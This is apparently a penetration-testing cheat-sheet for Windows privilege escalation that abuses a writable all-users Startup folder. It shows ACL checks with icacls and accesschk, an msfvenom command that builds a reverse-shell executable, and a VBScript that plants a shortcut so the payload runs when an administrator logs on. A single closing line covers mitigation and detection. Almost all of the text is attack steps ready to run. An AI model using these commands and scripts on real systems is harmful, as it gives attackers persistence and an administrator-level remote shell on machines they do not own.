The files in this directory are shortcuts (lnk files).
#In a low-privileged shell, run:
icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
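#Check if the BUILTIN\Users group has full access (F); the default ACL gives this group only read and execute (RX), so (F) here is a misconfiguration
#You can also run accesschk.exe to check the same thing (it reports access as R/W flags rather than icacls' (F))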
accesschk.exe /accepteula -d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
#Generate payload:
msfvenom -p windows/shell_reverse_tcp LHOST=ip LPORT=port -f exe -o x.exe
#METHOD 1
#Transfer it to
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
#Start a netcat listener, then simulate an admin login to get a shell (programs in this all-users Startup folder run as whichever user logs on)
#METHOD 2
#Transfer the reverse shell exe to C:\Temp\reverse.exe
#Create a VBScript to create a shortcut of that exe to the StartUp directory:
Set oWS = WScript.CreateObject("WScript.Shell")
sLinkFile = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\reverse.lnk"
Set oLink = oWS.CreateShortcut(sLinkFile)
oLink.TargetPath = "C:\Temp\reverse.exe"
oLink.Save
#Transfer the VBScript to target machine
#Run the script to create a shortcut:
cscript CreateShortcut.vbs
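#Simulate an admin login to get a shell
#Mitigation/detection: reset the folder ACL so BUILTIN\Users has only (RX), and alert on new files created in this Startup folder (e.g. Sysmon Event ID 11, FileCreate)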